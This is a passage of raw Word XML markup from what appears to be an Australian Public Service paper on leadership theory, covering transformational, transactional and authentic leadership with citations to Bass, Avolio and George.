            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008, p. 619)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="001760C6">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001235A7" w:rsidRDefault="001235A7" w:rsidP="001235A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than operate in one style or the other, </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Bass </w:t>
      </w:r>
      <w:r w:rsidR="0022596A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>proposes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> that transformational </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">leadership </w:t>
      </w:r>
      <w:r w:rsidR="009B6ED1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>augment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>the effects of transactional leadership</w:t>
      </w:r>
      <w:r w:rsidR="00824C4A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, citing </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Presidents </w:t>
      </w:r>
      <w:r w:rsidR="00824C4A" w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lincoln</w:t>
      </w:r>
      <w:r w:rsidR="00300A8E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Franklin D. Roosevelt</w:t>
      </w:r>
      <w:r w:rsidR="00300A8E">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00824C4A" w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="007A129A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">John F. Kennedy </w:t>
      </w:r>
      <w:r w:rsidR="00824C4A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>as examples of leaders comfortable swapping between styles</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          </w:rPr>
          <w:id w:val="-1401745736"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="005A0D09">
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5571" w:rsidRDefault="00BD5571" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F73D7" w:rsidRDefault="00DB2A45" w:rsidP="00DB2A45">
      <w:r>
        <w:t>Critic</w:t>
      </w:r>
      <w:r w:rsidR="005F6DEB">
        <w:t>s of transactional leadership point out that rewards motivate only at a base level</w:t>
      </w:r>
      <w:r w:rsidR="00476C4D">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="005F6DEB">
        <w:t xml:space="preserve">produce poorer results </w:t>
      </w:r>
      <w:r w:rsidR="00627ABB">
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidR="005F6DEB">
        <w:t xml:space="preserve"> higher level thinking is needed </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1524827456"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00160CE7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00160CE7">
            <w:instrText xml:space="preserve"> CITATION Bas08 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00160CE7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00160CE7" w:rsidRPr="00160CE7">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Bass &amp; Bass, 2008)</w:t>
          </w:r>
          <w:r w:rsidR="00160CE7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00160CE7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF73D9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC7F92">
        <w:t>While exchanges of higher quality goods (i.e. emotional resources) may improve outcomes, approaching leader-follower relationship</w:t>
      </w:r>
      <w:r w:rsidR="00E71B80">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00CC7F92">
        <w:t xml:space="preserve"> from a purely transactional perspective is likely to </w:t>
      </w:r>
      <w:r w:rsidR="00627ABB">
        <w:t>be</w:t>
      </w:r>
      <w:r w:rsidR="00CC7F92">
        <w:t xml:space="preserve"> limiting in the long</w:t>
      </w:r>
      <w:r w:rsidR="00627ABB">
        <w:t xml:space="preserve"> term.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346518" w:rsidRDefault="00A46F8F" w:rsidP="00A46F8F">
      <w:r>
        <w:t xml:space="preserve">The main challenge for transformational leadership is that despite being conceived as morally positive, the intentions of transformational leaders cannot be guaranteed which could lead to abuse of power in the hands of a skilled operator. </w:t>
      </w:r>
      <w:r w:rsidR="002B06E8">
        <w:t xml:space="preserve">The suggestion that </w:t>
      </w:r>
      <w:r w:rsidR="00346518">
        <w:t>‘there are pseudo versus authentic transformational leaders’</w:t>
      </w:r>
      <w:r w:rsidR="002B06E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>led to</w:t>
      </w:r>
      <w:r w:rsidR="00EB2B15">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>research into</w:t>
      </w:r>
      <w:r w:rsidR="00EB2B15">
        <w:t xml:space="preserve"> authentic leadership</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="802659014"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidDel="00A46F8F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidDel="00A46F8F">
            <w:instrText xml:space="preserve">CITATION Avo09 \p 423 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidDel="00A46F8F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidDel="00A46F8F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="005A0D09" w:rsidDel="00A46F8F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Avolio, et al., 2009, p. 423)</w:t>
          </w:r>
          <w:r w:rsidDel="00A46F8F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00EB2B15">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001938A1" w:rsidRDefault="001938A1" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Further reading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0344" w:rsidRDefault="00346518" w:rsidP="005C26DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>MacGregor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burns (1978). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>Leadership</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE0344">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35923" w:rsidRDefault="002D47BA" w:rsidP="007D4C39">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc374536617"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Contemporary thinking on leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00F82BA2" w:rsidRPr="00F82BA2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A11345" w:rsidRDefault="00A11345" w:rsidP="007D4C39">
      <w:r>
        <w:t>The last t</w:t>
      </w:r>
      <w:r w:rsidR="00F014BB">
        <w:t>hirty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> years has seen leadership thought evolve in a less linear manner. Rather than seeking ‘one true theory’ of leadership, </w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t>contemporary thinking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has explored the idea of leadership from different perspectives. Th</w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t>ese contemporary concepts of leadership</w:t>
      </w:r>
      <w:r w:rsidR="00F014BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inform the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C26DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>APS Leadership Development Strategy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (2011) and resulting talent and leadership development activities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC7526" w:rsidRPr="00D74478" w:rsidRDefault="00BC7526" w:rsidP="00BC7526">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc374536618"/>
      <w:r>
        <w:t>Authentic leadership</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00726A5A" w:rsidRDefault="00726A5A" w:rsidP="00726A5A">
      <w:pPr>
        <w:pStyle w:val="APSCBulletedtext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentic leadership focuses on </w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t xml:space="preserve">transparent and ethical </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">leader behaviour and encourages </w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sharing</w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> information needed to make decisions while accepting followers’ inputs</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1011674689"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> CITATION Avo09 \l 3081 </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="007D4C39">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Avolio, et al., 2009)</w:t>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C153F4" w:rsidRPr="005A0D09" w:rsidRDefault="003F397D" w:rsidP="007D4C39">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Broad</w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r w:rsidR="00DD4609" w:rsidRPr="005C26DE">
        <w:t>nterest</w:t>
      </w:r>
      <w:r w:rsidR="00FE49F3">
        <w:t xml:space="preserve"> in authentic leadership</w:t>
      </w:r>
      <w:r w:rsidR="00DD4609" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782AF4">
        <w:t>was prompted by</w:t>
      </w:r>
      <w:r w:rsidR="00DD4609" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve"> the release of Bill George’s </w:t>
      </w:r>
      <w:r w:rsidR="00DD4609" w:rsidRPr="005C26DE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Authentic Leadership</w:t>
      </w:r>
      <w:r w:rsidR="00DD4609" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve"> in 2003. For George</w:t>
      </w:r>
      <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve"> ‘authentic leadership results from knowing yourself - your strengths and weaknesses – by understanding your unique life story and the crucibles you have experienced’</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="567927632"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
            <w:instrText xml:space="preserve">CITATION Geo12 \p 313 \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
            <w:t xml:space="preserve"> (George, 2012, p. 313)</w:t>
          </w:r>
          <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B110ED" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00447822">
        <w:t>While v</w:t>
      </w:r>
      <w:r w:rsidR="00040D92">
        <w:t xml:space="preserve">arious </w:t>
      </w:r>
      <w:r w:rsidR="00FE49F3">
        <w:t xml:space="preserve">definitions </w:t>
      </w:r>
      <w:r w:rsidR="00040D92">
        <w:t>of authentic leadership</w:t>
      </w:r>
      <w:r w:rsidR="00447822">
        <w:t xml:space="preserve"> have been developed, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002B44EB" w:rsidRPr="005C26DE">
        <w:t>Avolio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002B44EB" w:rsidRPr="005C26DE">
        <w:t xml:space="preserve">, et al, </w:t>
      </w:r>
      <w:r w:rsidR="00C153F4">
        <w:t xml:space="preserve">suggest there </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00C153F4">
        <w:t>general agreement</w:t>
      </w:r>
      <w:r w:rsidR="00C153F4" w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> t</w:t>
      </w:r>
      <w:r w:rsidR="00C153F4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>hat the</w:t>
      </w:r>
      <w:r w:rsidR="00C153F4" w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> following are key components of authentic leadership: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C153F4" w:rsidRPr="005A0D09" w:rsidRDefault="00C153F4" w:rsidP="00C153F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="180" w:line="300" w:lineRule="exact"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Balanced processing</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>—that is, ‘objectively analysing relevant data before making a decision’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C153F4" w:rsidRPr="005A0D09" w:rsidRDefault="00C153F4" w:rsidP="00C153F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="180" w:line="300" w:lineRule="exact"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Internalized moral perspective—</w:t>
      </w:r>
      <w:r w:rsidRPr="005A0D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that is, ‘being guided by internal moral standards, which are used to self-regulate one’s behaviour’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C153F4" w:rsidRPr="00B96680" w:rsidRDefault="00C153F4" w:rsidP="00C153F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="180" w:line="300" w:lineRule="exact"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C3718">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Relational transparency</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3718">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>—that is, ‘presenting one’s authentic self through openly sharing information and feelings as appropriate for situations’.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A35923" w:rsidRPr="00AF54BC" w:rsidRDefault="00C153F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:after="180" w:line="300" w:lineRule="exact"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E37CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Self-awareness</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF73D9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">—that is, a ‘demonstrated understanding of one’s strengths and weaknesses, and the way one </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB5AA3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>makes sense of the world’</w:t>
      </w:r>
      <w:r w:rsidRPr="003C6214">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:szCs w:val="20"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:id w:val="-1635332496"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00B96680">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="000934DC">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve">CITATION Avo09 \n  \l 3081 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B96680">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="000934DC" w:rsidRPr="007D4C39">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:szCs w:val="20"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:t>(2009)</w:t>
          </w:r>
          <w:r w:rsidRPr="00B96680">
            <w:rPr>
              <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
              <w:szCs w:val="20"/>
              <w:lang w:eastAsia="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="001E37CE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000934DC" w:rsidRDefault="000934DC" w:rsidP="004464C0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Criticisms and challenges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6A27" w:rsidRDefault="00D13B82" w:rsidP="004F6A27">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As a relatively recent addition to leadership’s theoretical landscape, significant criticisms of authentic leadership have not yet arisen. </w:t>
      </w:r>
